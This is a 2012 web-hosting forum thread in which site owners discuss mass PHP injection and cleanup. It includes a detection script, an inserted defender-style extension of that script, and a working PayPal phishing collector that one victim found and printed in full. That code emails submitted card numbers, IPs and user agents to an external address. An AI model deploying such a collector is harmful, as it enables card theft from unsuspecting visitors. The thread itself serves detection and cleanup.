Sites hacked
02-29-2012, 11:38 AM
Post: #101
RE: Sites hacked
(02-29-2012 06:46 AM)artgeek Wrote:  But, since many are complaining about just WP sites being damaged, it's something targeting those, perhaps?

I do not think so, it just happens that there are so many WP sites. In your case you say it was a Joomla plugin; I had sites with Textpattern or MODx also attacked, or with a homegrown CMS. A friend running his own framework found a malicious file. He does not allow the execution of php outside of his framework, so it came to nothing, but the initial file was there.
02-29-2012, 12:19 PM
Post: #102
RE: Sites hacked
it's not just wordpress. my invision forum files also had redirect code injected into them. i deleted all the files and did a fresh install of the latest versions of both invision and wordpress. i changed the passwords etc., switched to sftp only. everything was fine for a week, and then the same thing happened again. i have again deleted and re-installed all the wordpress files, and am in the process of doing that with the forum software as well. but i've no guarantee that the same thing won't happen again in a few days.

if this problem is a result of a server-end exploit what ways are there for us to prevent this? i have no third party plugins on wordpress or any modifications to invision, and it seems unlikely that the problem lies with wordpress or invision.
02-29-2012, 01:38 PM
Post: #103
RE: Sites hacked
(02-25-2012 10:30 AM)Kris@WLP Wrote:  For Windozers like myself, how do we get a UNIX command prompt?

Try Bitvise Tunnelier; it'll give you both a terminal and a GUI SCP, file-manager-looking window.

Jw

A person who never made a mistake never tried anything new. - Albert Einstein
02-29-2012, 01:55 PM
Post: #104
RE: Sites hacked
Add me to the list of DH customers affected by this. One of my 5 WP sites was hacked. It doesn't appear the other 4 were, but I'm running the clean script just in case.
02-29-2012, 02:06 PM
Post: #105
RE: Sites hacked
After five years hosting two domains at Dreamhost, with no security incidents, I found today that ALL the php files in my account (even my own test.php files, outside any application; 6589 files) had been injected, timestamp Feb 24 20:34 PST.

I have only one ssh active account, the "last" command does not show any suspicious logins. And my password (already changed) was pretty secure.
The permissions also seem OK to me; look at the differences (the tar was archived a week before):

[lilongwe]~ $ tar tvzf backups/backupquick1.tar.gz blog2/wp-config.php
-rw-r----- hgonzal/pg1088916 3614 2012-02-15 08:03 blog2/wp-config.php
[lilongwe]~ $ l hjg.com.ar.hacked/blog2/wp-config.php
-rw-r----- 1 hgonzal pg1088916 10837 Feb 24 20:33 hjg.com.ar.hacked/blog2/wp-config.php

This is pretty scary, as it suggests (to me) some privilege escalation vulnerability.
02-29-2012, 03:32 PM
Post: #106
RE: Sites hacked
You might have a shell lurking in your userspace (that cleaner just patches some injected redirects).
02-29-2012, 06:04 PM
Post: #107
RE: Sites hacked
how does one locate and remove any lurking shells?
02-29-2012, 07:10 PM
Post: #108
RE: Sites hacked
(02-29-2012 06:04 PM)arnabchakladar Wrote:  how does one locate and remove any lurking shells?

I suppose with "ps aux". But doing this I realized (what I already knew, but had forgotten) that Dreamhost runs php53.cgi in sudo mode (as the respective user). This makes everything more understandable, and there is no need to suspect escalation vulnerabilities: anyone who can upload a php script to my domain can execute it as my user (and do a lot of harm).

I had cleared all the injected php files, but I had missed the "bootstrap" scripts, those which made the injection. For this I wrote this little script: suspicious_php.sh

Code:
#!/bin/sh
# prints the filename if the first 2 lines contain more than 5000 bytes
# (long unbroken lines are typical of packed/obfuscated PHP)
file=$1
bytes=$(head -n 2 "$file" | wc --bytes)
# POSIX test instead of bash-only (( )), which /bin/sh may not support
if [ "$bytes" -gt 5000 ]
then
  echo "$file"
fi

and run

Code:
ls -lad `find . -name '*.php'  -type f -exec ./suspicious_php.sh '{}' \;`

and got:

Code:
-rw-r--r-- 1 hgonzal       pg1088916 28278 Feb 14 23:46 blog2d/tmp/si-contact-form/captcha/temp/r.php
-rw-rw-r-- 1 hgonzal       pg1088916 21675 Feb 29 15:49 foro/style.php
-rw-r--r-- 1 rockitscience pg1161296 21675 Jan 19 14:22 zanganos/2010/02/style.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/2009/r.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/assets_c/r.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/images/r.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/r.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/ref/r.php
-rw-r--r-- 1 xixax         pg1058816 28278 Feb 14 23:45 zanganos/txt/r.php

These are the bad guys. These files also push the original intrusion further back in time: these scripts are dormant until someone executes them remotely. What I still don't understand is how these scripts got there (perhaps some vulnerability in a WordPress plugin?) and especially why they have those ownerships ('hgonzal' is my user; the others are not related). Whatever, I'll delete them and keep an eye on future appearances.
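A defender-side variant of the size heuristic from the post above, added here as an example and not the poster's script: `suspicious_php`, `make_sample_tree` and `count_suspicious` are names assumed for this illustration. It generalises the check into a function that scans a whole directory with a configurable byte threshold, copes with empty files and with paths containing spaces, and exercises itself on a constructed sample tree (no real malware).

```shell
#!/bin/sh
# Added example, not the poster's script: the "first two lines are huge"
# heuristic generalised into a directory scan with a configurable threshold.

# suspicious_php DIR [THRESHOLD]  -> prints each matching path on its own line
suspicious_php() {
  dir=$1
  threshold=${2:-5000}
  # -exec ... {} + batches paths and the inner sh quotes them, so names
  # with spaces survive (the backtick/ls form above would split them).
  find "$dir" -type f -name '*.php' -exec sh -c '
    threshold=$1; shift
    for f in "$@"; do
      # byte count of the first two lines only; legitimate source wraps
      # early, packed/obfuscated uploads usually do not. Empty files give 0.
      bytes=$(( $(head -n 2 "$f" | wc -c) ))
      if [ "$bytes" -gt "$threshold" ]; then
        printf "%s\n" "$f"
      fi
    done' sh "$threshold" {} +
}

# Constructed sample tree: a normal file, an empty file, and one whose
# second line is a 6000-byte unbroken blob standing in for a packed payload.
make_sample_tree() {
  root=$(mktemp -d)
  mkdir -p "$root/blog/wp-content/uploads"
  printf '<?php\necho "hello";\n' > "$root/blog/index.php"
  : > "$root/blog/empty.php"
  { printf '<?php\n'; printf '%6000s\n' '' | tr ' ' 'A'; } \
    > "$root/blog/wp-content/uploads/r.php"
  printf '%s\n' "$root"
}

# count_suspicious DIR [THRESHOLD] -> number of flagged files
count_suspicious() {
  suspicious_php "$1" "${2:-5000}" | wc -l | tr -d ' '
}

# Stand-alone run: build the sample tree, list what gets flagged, clean up.
sample=$(make_sample_tree)
suspicious_php "$sample"
rm -rf "$sample"
```

Treat a hit as a lead, not a verdict: minified libraries also have long lines, so compare flagged files against a clean copy of the application before deleting anything.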
02-29-2012, 10:01 PM
Post: #109
RE: Sites hacked
thanks to everyone who contributed clean-up scripts to scrub infected php files. that helped me clean up 4 WP sites hosted through dreamhost. today however, we received an email from someone who had received paypal phishing spam linking to 2 new files in the root directory of one of those WP sites:
pp.php and index1.php. both of those files had dates indicating they had been around for only a day or less. they both contained the same code:
Code:
<?php

foreach($_POST as $key => $val)
{
$msg .= "$key - $val \r\n";    
}
$cardnumber = $_POST['cardnumber'];
if(empty($cardnumber))
{
die(header("Location: https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US"));
}
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$msg .= "IP $$ip
Agent $agent";
$to = "smokeyalrman@gmail.com";
$subject = "Sining in Sun $cardnumber";
// echo $msg;
$body = "Hi,\n\nHow are you? $cardnumber";
if (mail($to, $subject, $msg)) {
   header("Location: https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US");
   //echo("<p>Message successfully sent!</p>");
  } else {
   echo("<p>Message delivery failed...</p>");
  }
?>

i've renamed those files (should probably just delete them), but was wondering if anyone else had run into this issue yet. and is it worth even reporting this to dreamhost at this point? their response to me on the first hack was a joke.

thanks, and good luck out there. if anyone can recommend a hosting service that can easily migrate over entire sites, i'm all ears.

-rob
02-29-2012, 10:32 PM (This post was last modified: 02-29-2012 10:33 PM by imonglue.)
Post: #110
RE: Sites hacked
At this moment I really don't have the patience to read all posts here, so I am sorry if I am posting something that has probably already been answered numerous times.

You can add me to the list - all four of my WordPress installs are infected. I opened a support ticket and am waiting to hear back, but is there nothing Dreamhost can do? Do I need to clean up all my sites myself? Delete and reinstall, etc.?